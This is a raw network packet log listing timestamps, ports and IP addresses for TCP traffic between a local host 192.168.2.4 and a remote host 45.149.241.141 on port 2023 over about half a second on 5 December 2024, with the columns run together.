                                                                                                                  Dec 5, 2024 10:46:36.952193022 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:36.953057051 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:36.953103065 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:36.953135014 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:36.954138041 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:36.954205990 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:36.954271078 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:36.955466986 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:36.955492973 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:36.955513954 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:36.956480980 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:36.956533909 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:36.956551075 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:36.957351923 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:36.957422018 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:36.957426071 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:36.958530903 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:36.958579063 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:36.958616018 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:36.959655046 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:36.959703922 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:36.959748030 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:36.961172104 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:36.961189985 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:36.961216927 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:36.962184906 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:36.962239981 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:36.962260962 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:36.963150024 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:36.963202000 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:36.963247061 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:36.964183092 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:36.964257002 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:36.964303970 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:36.965310097 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:36.965373039 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:36.965440035 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:36.966407061 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:36.966528893 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:36.966584921 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:36.967533112 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:36.967586994 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:36.967597961 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:36.968667030 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:36.968830109 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:36.968883991 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:36.969851971 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:36.969913960 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:36.969985008 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:36.970971107 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:36.971026897 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:36.971064091 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:36.972112894 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:36.972186089 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:36.972237110 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:36.973298073 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:36.973505974 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:36.973550081 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:36.974473953 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:36.974533081 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:36.974570036 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:36.975558043 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:36.975615978 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:36.975663900 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:36.976809025 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:36.976861954 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:36.976900101 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:36.977987051 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:36.978019953 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:36.978063107 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:36.978864908 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:36.978929043 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:36.978987932 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:36.980037928 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:36.980094910 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:36.980129957 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:36.981216908 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:36.981287956 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:36.981359005 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:36.982327938 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:36.982383013 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:37.115571022 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.115596056 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.115727901 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:37.116034031 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.116185904 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.116785049 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:37.116971970 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.117117882 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.117171049 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:37.117981911 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.118074894 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.118124008 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:37.118956089 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.119056940 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.119102001 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:37.120074034 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.120177031 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.120224953 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:37.121298075 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.121419907 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.121469021 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:37.122847080 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.123112917 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.123651981 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:37.124038935 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.124082088 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.124130964 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:37.125087023 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.125197887 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.125245094 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:37.125957966 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.126092911 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.126157045 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:37.127041101 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.127160072 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.127207994 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:37.128246069 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.128357887 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.128411055 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:37.129504919 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.129626989 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.129677057 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:37.130584955 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.130630016 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.130676031 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:37.131742001 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.131930113 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.131982088 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:37.133083105 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.133260965 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.133359909 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:37.134711981 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.134767056 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.134816885 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:37.135642052 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.135715008 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.135771036 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:37.136596918 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.136648893 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.136703968 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:37.137501955 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.137586117 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.138248920 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:37.138582945 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.138748884 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.138799906 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:37.139638901 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.139895916 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.139949083 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:37.140650988 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.140666008 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.140697956 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:37.141824961 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.141977072 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.142024040 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:37.142786026 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.142843008 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.142899036 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:37.143964052 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.144028902 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.144076109 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:37.145088911 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.145401955 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.145450115 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:37.146199942 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.146290064 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.146337032 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:37.147432089 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.147500992 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.147547007 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:37.148526907 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.148699045 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.148747921 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:37.150028944 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.150074005 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.150126934 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:37.151174068 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.151226997 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.151276112 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:37.152224064 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.152282000 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.152333021 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:37.153242111 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.153306007 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.153362989 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:37.154233932 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.154283047 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.154329062 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:37.155301094 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.155394077 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.155440092 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:37.156486988 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.156610012 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.156646967 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:37.157666922 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.157718897 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.157876968 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:37.158727884 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.158835888 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.158878088 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:37.159856081 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.159933090 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.160005093 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:37.160995007 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.161088943 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.161180019 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:37.162153006 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.162240028 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.162348032 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:37.163280964 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.163516045 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.163569927 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:37.164503098 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.164530039 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.164630890 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:37.165587902 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.165664911 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.165724039 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:37.166692972 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.166816950 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.166882992 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:37.167866945 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.167990923 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.168194056 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:37.168994904 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.169100046 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.169147015 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:37.170126915 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.170236111 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.170319080 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:37.171020985 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.171210051 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.171257973 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:37.172343016 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.172413111 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.172519922 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:37.173409939 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.173496008 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.173541069 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:37.174360991 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.273969889 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:37.307060957 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.307085037 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.307137966 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:37.307452917 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.307661057 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.308080912 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:37.308912992 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.309048891 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.309088945 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:37.310831070 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.310847998 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.310897112 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:37.311755896 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.311801910 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.311867952 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:37.312429905 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.312537909 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.312578917 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:37.313405991 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.313520908 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.313566923 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:37.314366102 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.314393997 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.314433098 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:37.315476894 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.315511942 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.315551996 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:37.316684961 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.316740990 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.316811085 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:37.317868948 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.317955017 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.318053007 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:37.318923950 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.319067955 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.319519043 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:37.320076942 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.320185900 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.321129084 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:37.321219921 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.321295023 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.321327925 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:37.322421074 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.322499037 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.322540045 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:37.323575974 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.323684931 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.323720932 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:37.324739933 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.324903011 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.324947119 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:37.325995922 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.326046944 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.326087952 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:37.326941967 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.327044010 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.327686071 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:37.327977896 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.328078032 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.328118086 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:37.329140902 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.329245090 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.329334021 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:37.330518961 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.330605984 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.330646992 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:37.331510067 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.331605911 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.331640959 CET497382023192.168.2.445.149.241.141
                                                                                                                  Dec 5, 2024 10:46:37.332531929 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.332679987 CET20234973845.149.241.141192.168.2.4
                                                                                                                  Dec 5, 2024 10:46:37.332716942 CET497382023192.168.2.445.149.241.141
